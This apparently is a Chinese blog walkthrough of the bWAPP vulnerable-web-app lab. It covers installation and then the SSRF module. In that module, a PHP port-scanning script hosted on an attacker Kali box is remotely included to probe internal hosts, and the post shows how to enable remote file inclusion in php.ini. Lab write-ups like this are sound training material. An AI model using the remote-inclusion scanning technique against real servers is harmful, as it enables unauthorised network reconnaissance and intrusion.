bWAPP靶場實戰


在這裏插入圖片描述

一、靶場介紹

  集成了超過100餘個網絡漏洞,php web漏洞靶場,能夠調製漏洞難度等級(低->中->高)。

二、靶場搭建

2.1 安裝類型

搭建類型有兩種:(虛擬機版本可測試測漏洞類型更多,比如破殼、心臟滴血)

  • 獨立安裝(部署到apache + php +mysql環境下)
  • 虛擬機安裝(bee-box)

2.2 獨立安裝

》》下載解壓bwapp到本地web目錄下
在這裏插入圖片描述
》》編輯如下文件
在這裏插入圖片描述
》》訪問如下地址,進行安裝初始化
在這裏插入圖片描述
》》安裝完成
在這裏插入圖片描述
》》輸入用戶名:密碼,選擇安全等級進行登錄
在這裏插入圖片描述
》》登錄成功
在這裏插入圖片描述

三、漏洞實戰

SSRF

》》選擇SSRF漏洞,點擊Hack
在這裏插入圖片描述
》》如下的三個攻擊場景

  • 利用遠程文件包含進行端口掃描(內網探測)
  • 使用XXE進行文件讀取(文件讀取)
  • 使用XXE進行SmartTV拒絕服務利用(漏洞利用)
    在這裏插入圖片描述

遠程文件包含端口掃描

  • 這裏利用的HTTP協議

》》點擊任務1中如下位置,獲取端口掃描腳本
在這裏插入圖片描述
》》如果沒有拿到,可以去如下文件位置取出
在這裏插入圖片描述
》》進入遠程文件包含漏洞模塊處進行利用
在這裏插入圖片描述
》》選擇語言點擊Go
在這裏插入圖片描述
》》可查看到get請求地址中請求的資源文件
在這裏插入圖片描述
》》這裏我們遠程包含一臺其它服務器資源驗證遠程包含是否成功(kali:192.168.226.134)
在這裏插入圖片描述
》》我們將之前的ssrf-1.txt端口掃描文件放入到kali的web目錄下:
在這裏插入圖片描述
(ssrf-1.txt腳本內容(php端口掃描腳本))

<?php

if(isset($_REQUEST["ip"]))
{
    //list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
    $results = array();
    foreach($ports as $port)
    {

        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {
            $results[$port] = true;
            fclose($pf); 
        }
        else
        {
            $results[$port] = false;        
        }
    }
 
    foreach($results as $port=>$val)
    {

        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";

        if($val)
        {
            echo "<span style=\"color:green\">OK</span><br/>";
        }
        else
        {
            echo "<span style=\"color:red\">Inaccessible</span><br/>";
        }
    }
}
?>

》》利用遠程包含探測端口

需要利用hackbar傳入post目標地址的ip,從下方可直觀看出掃描處的端口

在這裏插入圖片描述
》》也可以掃遠程內網的其它主機(如這裏的kali)
在這裏插入圖片描述

Tips:
問題:文件包含時報如下錯誤:
在這裏插入圖片描述
解決:
找到對應版本的php.ini php配置文件
在這裏插入圖片描述
啓動遠程文件包含(默認關閉)
在這裏插入圖片描述
保存文件重啓服務

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章